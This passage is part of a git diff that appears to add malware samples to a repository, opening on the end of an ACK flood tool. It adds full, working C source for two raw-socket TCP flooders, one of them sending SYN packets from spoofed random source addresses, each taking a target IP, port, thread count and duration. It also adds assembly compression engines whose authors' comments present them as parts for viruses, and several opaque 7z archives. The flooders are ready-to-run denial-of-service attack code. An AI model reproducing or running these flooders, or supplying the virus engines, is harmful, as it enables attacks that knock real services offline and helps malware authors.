+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 5){
+		fprintf(stderr, "Improper ACK flood parameters!\n");
+		fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+
+	fprintf(stdout, "Setting up Sockets...\n");
+
+	int num_threads = atoi(argv[2]);
+	int maxpps = atoi(argv[3]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	
+	int multiplier = 100;
+
+	int i;
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.XMLRPC.7z b/libs/VirTool.DDoS.XMLRPC.7z
new file mode 100644
index 00000000..193a0800
Binary files /dev/null and b/libs/VirTool.DDoS.XMLRPC.7z differ
diff --git a/libs/VirTool.DDoS.XSYN.c b/libs/VirTool.DDoS.XSYN.c
new file mode 100644
index 00000000..e57c5c75
--- /dev/null
+++ b/libs/VirTool.DDoS.XSYN.c
@@ -0,0 +1,215 @@
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <time.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+        char ip[17];
+        snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(rand()%54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr(ip);
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(rand()%65535);
+	tcph->seq = rand();
+	tcph->ack_seq = 0;
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->syn = 1;
+	tcph->window = htonl(65535);
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = htons(floodport);
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+		setup_ip_header(iph);
+		setup_tcp_header(tcph);
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+
+
+		tcph->dest = htons(floodport);
+
+		iph->daddr = sin.sin_addr.s_addr;
+
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+        srand(time(0));
+	fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
+
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	
+	int multiplier = 20;
+
+	int i;
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.ZAP.c b/libs/VirTool.DDoS.ZAP.c
new file mode 100644
index 00000000..48310fdd
--- /dev/null
+++ b/libs/VirTool.DDoS.ZAP.c
@@ -0,0 +1,220 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
+ */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = rand();
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->psh = 1;
+	tcph->ack = 1;
+	tcph->urg = 1;
+	tcph->window = rand();
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = htons(floodport);
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+
+	fprintf(stdout, "Setting up Sockets...\n");
+
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	
+	int multiplier = 20;
+
+	int i;
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.Win32.Compression.Benny.asm b/libs/VirTool.Win32.Compression.Benny.asm
new file mode 100644
index 00000000..2501e67c
--- /dev/null
+++ b/libs/VirTool.Win32.Compression.Benny.asm
@@ -0,0 +1,416 @@
+;                                                     ЬЫЫЫЫЫЬ ЬЫЫЫЫЫЬ ЬЫЫЫЫЫЬ
+;   ЪД Benny's Compression Engine for Win32 Дї        ЫЫЫ ЫЫЫ ЫЫЫ ЫЫЫ ЫЫЫ ЫЫЫ
+;   і                   by                   і         ЬЬЬЫЫЯ ЯЫЫЫЫЫЫ ЫЫЫЫЫЫЫ
+;   АДДДДДДДДДДДДД Benny / 29A ДДДДДДДДДДДДДДЩ        ЫЫЫЬЬЬЬ ЬЬЬЬЫЫЫ ЫЫЫ ЫЫЫ
+;                                                     ЫЫЫЫЫЫЫ ЫЫЫЫЫЫЯ ЫЫЫ ЫЫЫ
+;
+;
+;
+;Hello everybody,
+;
+;let me introduce my second compression engine for Win32 enviroment (u can
+;find my first engine in Win32.Benny and Win98.Milennium). This engine
+;worx on "compressin' bit groups" base. When I started to write this stuff,
+;i wanted to write engine, that would work on Huffmann base. Then I decided
+;it's not needed to implement this complicated algorithm here, coz I wanna
+;be this engine small and effective.
+;
+;Not only this is truth. This engine is very fast, very small (only 478 bytes)
+;and has implemented my special compression algorithm, that is simple and has
+;very, ehrm, let's call it "interesting" compression ratio X-D.
+;
+;
+;
+;So how does it work ?
+;======================
+;
+;I said, this engine worx on "compressin' bit groups" base. What does it mean ?
+;Bit group (as I call it) is group of two bits. U know, every byte has 8 bits.
+;
+;Example:       byte 9Ah       group0 group1 group2 group3
+;               10011010  ===>   10     10     01     10
+;
+;As u can see, every byte has 4 bit groups and I said, it compresses
+;bit groups. Heh, u think i'm crazy when im tryin' to compress
+;two bits, yeah :?)
+;
+;
+;This engine will (on the beginnin') calculate, which bit group has
+;the biggest count of repetency, which second biggest, etc...
+;
+;Example:     group      count
+;               00  ===>  74
+;               01  ===>  32
+;               10  ===>  12
+;               11  ===>  26
+;
+;
+;That's not all. It has to sort items to know, which group has the biggest
+;count. I decided it's best to use "bubble sort algorithm". Then there isn't
+;any problem to use "our algorithm".
+
+;Look at this table, when in first column r sorted groups and in second
+;comlumn r <another> bits, which will represent new compressed data.
+;
+;Sorted by count:       1.  ===>  1
+;                       2.  ===>  00
+;                       3.  ===>  010
+;                       4.  ===>  011
+;
+;Finally, engine will replace bit groups with these bits.
+;Gewd thing on this algorithm is that there aren't needed same bytes to have
+;good compression ratio, but only some bits.
+;So now u know whole secret of my compression algorithm. U also know, why
+;I said, it has "interesting compression ratio". Look at the table and u will
+;see, what type of files can we strongly compress. They r both of binaries
+;and texts, but not every binaries or texts can be compressed as well as otherz. 
+;We can compress some binaries again with the same or better ratio. Why ?
+;Imagine, u have file with 1000x 0x0s. After compression we have 125x 0xFFs, that
+;can be compressed again. Some files can be after compression (negative even -
+;file is bigger) compressed again with positive compression (file is smaller).
+;Heh, crazy, isn't it ? X-DDD.
+;
+;
+;
+;How can I use BCE32 in my virus ?
+;==================================
+;
+;BCE32 is placed in two procedures called BCE32_Compress and BCE32_Decompress.
+;
+;
+;a) BCE32_Compress:
+;-------------------
+;Input state:
+;	1) ESI register - pointer to data, which will be compressed
+;	2) EDI register - pointer to memory, where will be placed compressed data
+;	3) ECX register - number of bytes to compress + 1 (do not forget "+ 1" !)
+;	4) EBX register - work memory (16 bytes)
+;	5) EDX register - work memory (16 bytes). MUST NOT be same as EBX !
+;
+;	call BCE32_Compress
+;
+;Output state:
+;	1) EAX register - new size of compressed data
+;	2) CF set, if negative compression
+;	3) Other registers r preserved (except FLAGS)
+;
+;
+;b) BCE32_Decompress:
+;---------------------
+;Input state:
+;	1) ESI register - pointer to compressed data
+;	2) EDI register - pointer to memory, where will be placed decompressed data
+;	3) ECX register - number of bytes to decompress (EAX value returned by
+;			  BCE32_Compress) - 1 (do not forget "- 1" !)
+;
+;	call BCE32_Decompress
+;
+;Output state:
+;	1) All registers r preserved
+;
+;
+;WARNING: 	Be sure, u have enought memory for case of negative compression.
+;NOTE:		U can compress (in some special cases) already compressed data.
+;		For this purpose exists output parameters EAX and CF.
+;
+;
+;
+;Do u like this (or my another work) ?
+;======================================
+;
+;Gimme know. If u have some notes or commentz for this, for another work,
+;or if u simply like it, mail me to benny@post.cz. Thanx.
+;
+;
+;
+;Don't u like it ?
+;==================
+;
+;Fuck u.
+;
+;
+;
+;(c) by Benny/29A May 1999.
+
+
+
+
+BCE32_Compress	Proc				;compression procedure
+	pushad					;save all regs
+
+;stage 1
+	pushad					;and again
+create_table:
+	push ecx				;save for l8r usage
+	push 4
+	pop ecx					;ECX = 4
+	lodsb					;load byte to AL
+l_table:push eax				;save it
+	xor edx, edx				;EDX = 0
+	and al, 3				;this stuff will separate and test
+	je st_end				;bit groups
+	cmp al, 2
+	je st2
+	cmp al, 3
+	je st3
+st1:	inc edx					;01
+	jmp st_end
+st2:	inc edx					;10
+	inc edx
+	jmp st_end
+st3:	mov dl, 3				;11
+st_end:	inc dword ptr [ebx+4*edx]		;increment count in table
+	pop eax
+	ror al, 2				;next bit group
+	loop l_table
+	pop ecx					;restore number of bytes
+	loop create_table			;next byte
+
+	push 4					;this will check for same numbers
+	pop ecx					;ECX = 4
+re_t:	cdq					;EDX = 0
+t_loop:	mov eax, [ebx+4*edx]			;load DWORD
+	inc dword ptr [ebx+4*edx]		;increment it
+	cmp eax, [ebx]				;test for same numbers
+	je _inc_				;...
+	cmp eax, [ebx+4]			;...
+	je _inc_				;...
+	cmp eax, [ebx+8]			;...
+	je _inc_				;...
+	cmp eax, [ebx+12]			;...
+	jne ninc_				;...
+_inc_:	inc dword ptr [ebx+4*edx]		;same, increment it
+	inc ecx					;increment counter (check it in next turn)
+ninc_:	cmp dl, 3				;table overflow ?
+	je re_t					;yeah, once again
+	inc edx					;increment offset to table
+	loop t_loop				;loop
+	popad					;restore regs
+
+;stage 2
+	pushad					;save all regs
+	mov esi, ebx				;get pointer to table
+	push 3
+	pop ebx					;EBX = 3
+	mov ecx, ebx				;ECX = 3
+rep_sort:					;bubble sort = the biggest value will
+						;always "bubble up", so we know number
+						;steps
+	push ecx				;save it
+	mov ecx, ebx				;set pointerz
+	mov edi, edx				;...
+	push edx				;save it
+	lodsd					;load DWORD (count)
+	mov edx, eax				;save it
+sort:	lodsd					;load next
+	cmp eax, edx				;is it bigger
+	jb noswap				;no, store it
+	xchg eax, edx				;yeah, swap DWORDs
+noswap:	stosd					;store it
+	loop sort				;next DWORD
+	mov eax, edx				;biggest in EDX, swap it
+	stosd					;and store
+	lea esi, [edi-16]			;get back pointer
+	pop edx					;restore regs
+	pop ecx
+	loop rep_sort				;and try next DWORD
+	popad
+
+;stage 3
+	pushad					;save all regs
+	xor eax, eax				;EAX = 0
+	push eax				;save it
+	push 4
+	pop ecx					;ECX = 4
+n_search:
+	push edx				;save regs
+	push ecx
+	lea esi, [ebx+4*eax]			;get pointer to table
+	push eax				;store reg
+	lodsd					;load DWORD to EAX
+	push 3
+	pop ecx					;ECX = 3
+	mov edi, ecx				;set pointerz
+search:	mov esi, edx
+	push eax				;save it
+	lodsd					;load next
+	mov ebp, eax
+	pop eax
+	cmp eax, ebp				;end ?
+	je end_search
+	dec edi					;next search
+	add edx, 4
+	loop search
+end_search:
+	pop eax					;and next step
+	inc eax
+	pop ecx
+	pop edx
+	add [esp], edi
+	rol byte ptr [esp], 2
+	loop n_search
+	pop [esp.Pushad_ebx]			;restore all
+	popad					;...
+
+;stage 4
+	xor ebp, ebp				;EBP = 0
+	xor edx, edx				;EDX = 0
+	mov [edi], bl				;store decryption key
+	inc edi					;increment pointer
+next_byte:
+	xor eax, eax				;EAX = 0
+	push ecx
+	lodsb					;load next byte
+	push 4
+	pop ecx					;ECX = 4
+next_bits:
+	push ecx				;store regs
+	push eax
+	and al, 3				;separate bit group
+
+	push ebx				;compare with next group
+	and bl, 3
+	cmp al, bl
+	pop ebx
+	je cb0
+
+	push ebx				;compare with next group
+	ror bl, 2
+	and bl, 3
+	cmp al, bl
+	pop ebx
+	je cb1
+
+	push ebx				;compare with next group
+	ror bl, 4
+	and bl, 3
+	cmp al, bl
+	pop ebx
+	je cb2
+
+	push 0					;store bit 0
+	call copy_bit
+	push 1					;store bit 1
+	call copy_bit
+cb0:	push 1					;store bit 1
+end_cb1:call copy_bit
+	pop eax
+	pop ecx
+	ror al, 2
+	loop next_bits				;next bit
+	pop ecx
+	loop next_byte				;next byte
+	mov eax, edi				;save new size
+	sub eax, [esp.Pushad_edi]		;...
+	mov [esp.Pushad_eax], eax		;...
+	popad					;restore all regs
+	cmp eax, ecx				;test for negative compression
+	jb c_ok					;positive compression
+	stc					;clear flag
+	ret					;and quit
+c_ok:	clc					;negative compression, set flag
+	ret					;and quit
+cb1:	push 0					;store bit 0
+end_cb2:call copy_bit
+	push 0					;store bit 0
+	jmp end_cb1
+cb2:	push 0					;store bit 0
+	call copy_bit
+	push 1					;store bit 1
+	jmp end_cb2
+copy_bit:
+	mov eax, ebp				;get byte from EBP
+	shl al, 1				;make space for next bit
+	or al, [esp+4]				;set bit
+cbit:	inc edx					;increment counter
+	cmp dl, 8				;byte full ?
+	jne n_byte				;no, continue
+	stosb					;yeah, store byte
+	xor eax, eax				;and prepare next one
+	cdq					;...
+n_byte:	mov ebp, eax				;save back byte
+	ret Pshd		;quit from procedure with one parameter on stack
+	db	'[BCE32]', 0			;little signature
+BCE32_Compress	EndP				;end of compression procedure
+
+
+
+BCE32_Decompress	Proc			;decompression procedure
+	pushad					;save all regs
+	xor eax, eax				;EAX = 0
+	xor ebp, ebp				;EBP = 0
+	cdq					;EDX = 0
+
+	lodsb					;load decryption key
+	push eax				;store it
+	lodsb					;load first byte
+	push 8					;store 8
+	push edx				;store 0
+d_bits:	push ecx				;store ECX
+
+	test al, 80h				;test for 1
+	jne db0
+	test al, 0c0h				;test for 00
+	je db1
+	test al, 0a0h				;test for 010
+	je db2
+	mov cl, 6				;its 011
+	jmp tb2
+
+testb:	test bl, 1				;is it 1 ?
+	jne p1
+	push 0					;no, store 0
+_tb_:	mov eax, ebp				;load byte to EAX
+	or al, [esp]				;set bit
+	ror al, 1				;and make space for next one
+	call cbit				;end of procedure
+	ret					;...
+p1:	push 1					;store 1
+	jmp _tb_				;and continue
+
+db0:	xor cl, cl				;CL = 0
+	mov byte ptr [esp+4], 1			;store 1
+testbits:
+	push eax				;store it
+	push ebx				;...
+	mov ebx, [esp+20]			;load parameter
+	ror bl, cl				;shift to next bit group
+	call testb				;test bit
+	ror bl, 1				;next bit
+	call testb				;test it
+	pop ebx					;restore regs
+	pop eax
+
+	mov ecx, [esp+4]			;load parameter
+bcopy:	cmp byte ptr [esp+8], 8			;8. bit ?
+	jne dnlb				;nope, continue
+	mov ebx, eax				;load next byte
+	lodsb
+	xchg eax, ebx
+	mov byte ptr [esp+8], 0			;and nulify parameter
+	dec dword ptr [esp]			;decrement parameter
+dnlb:	shl al, 1				;next bit
+	test bl, 80h				;is it 1 ?
+	je nb					;no, continue
+	or al, 1				;yeah, set bit
+nb:	rol bl, 1				;next bit
+	inc byte ptr [esp+8]			;increment parameter
+	loop bcopy				;and align next bits
+	pop ecx					;restore ECX
+	inc ecx					;test flags
+	dec ecx					;...
+	jns d_bits				;if not sign, jump
+
+	pop eax					;delete pushed parameters
+	pop eax					;...
+	pop eax					;...
+	popad					;restore all regs
+	ret					;and quit
+
+db1:	mov cl, 2				;2. bit in decryption key
+	mov [esp+4], cl				;2 bit wide
+	jmp testbits				;test bits
+db2:	mov cl, 4				;4. bit
+tb2:	mov byte ptr [esp+4], 3			;3 bit wide
+	jmp testbits				;test bits
+BCE32_Decompress	EndP			;end of decompression procedure
diff --git a/libs/VirTool.Win32.Compression.Bpce.7z b/libs/VirTool.Win32.Compression.Bpce.7z
new file mode 100644
index 00000000..65b25dfc
Binary files /dev/null and b/libs/VirTool.Win32.Compression.Bpce.7z differ
diff --git a/libs/VirTool.Win32.Compression.Nibble.asm b/libs/VirTool.Win32.Compression.Nibble.asm
new file mode 100644
index 00000000..cc6b448c
--- /dev/null
+++ b/libs/VirTool.Win32.Compression.Nibble.asm
@@ -0,0 +1,198 @@
+
+; BNCE - BlueOwls Nibble Compression Engine
+; *****************************************
+; 
+;  Introduction
+;  ************
+;
+;  I made this engine for virusses which want to use some algorithm to make
+;  themselves  or  something else  smaller  (obviously), but  i  wanted the
+;  algorithm to be small too, because if it isn't it would have little  use
+;  for virusses. In this case, I tried to make the decompressor as small as 
+;  possible, and let the compressor do most of the work.
+;
+;  How it works
+;  ************
+;
+;  Every byte has 4 nibbles and these can be compressed. The compression is
+;  done by counting the number of nibbles  in the entire  data  and  change
+;  the  nibble  sizes  accordingly. The most  common  of  the four possible 
+;  nibbles will be compressed, #2 will stay the same size and #3 & #4  will
+;  be expanded. This means that  as long  as the  number #1s >  the numbers 
+;  #3+#4  compression  occurs, otherwise  the  data  will be  expanded. The  
+;  maximum reducement is 50%, and the maximum enlargement is 112,5%.
+;
+;  Notes
+;  *****
+;
+;  - The bnce_compress and bnce_decompress are not in  any way dependent on
+;    each other, and both do not use any (external)  data, you can run them
+;    without the write flag set.
+;  - A  small optimization  is possible  for  the  decryptor if you like to
+;    decrypt  only  one thing  with  a static  size with it; remove the (*)
+;    lines in the compressor and change the (@) lines in mov ecx, size;
+;    or push size, pop  ecx. It  will  save  one  or  three  bytes  in  the
+;    decompressor, wow! :P
+;  - I have not encounterd any bugs, and  the only errors could arrise from
+;    a faulty parameters; too small output buffers  or corrupted compressed
+;    data fed to the decompressor. All which are not very likely.
+;  - In some extreme cases, already compressed data can be compressed again
+;    but this is only possible when the are a lot of same  nibble repeaten-
+;    cies; for example: 1111b becomes 00b; and  00b becomes 0b. But it does
+;    not occur very often.
+;  - As the maximum  enlargement is  112,5%  I would at  least  allocate an
+;    output   buffer   of   size   *12 /10   if  the  data  is  not  static.
+;
+;  Last words
+;  **********
+;
+;  I made this engine for fun and I had fun with it, I hope you like it and
+;  can use it in someway. Feel free  to  modify it to your needs. See Notes
+;  for more details. Anyway, I  hope you like  it and  if you  like to  let
+;  me  know  something  please  do  and  send mail to xblueowl@hotmail.com.
+
+; I compiled this stuff with FASM, but you should be  able to assemble this
+; with any popular assembler (MASM/TASM/FASM/NASM?) :).
+
+; compress
+; in: esi = ptr to data to compress
+;     ecx = size of data to compress
+;     edi = ptr to output buffer
+; out: edi = end of data put in output buffer
+; size: 165 bytes
+
+bnce_compress:	push    03020100h       ; push table
+		push	esi
+		push	ecx
+		sub	eax, eax        ; eax = 0
+		cdq		        ; edx = 0
+		push	eax	        ; 4 counters for the 4 existing nibbles
+		push	eax
+		push	eax
+		push	eax
+count_bytes:	push	ecx	        ; save no. of bytes
+		push    4
+		pop	ecx	        ; ecx = 4
+		lodsb
+count_bits:	sub	ah, ah
+		shl	eax, 2	        ; ah = first 2 bits
+		mov	dl, ah	        ; dl = 2 bits
+		inc	dword [esp+4+edx*4] ; count it
+		loop	count_bits
+		pop	ecx
+		loop	count_bytes     ; now the 4 counters are filled with the correct values
+
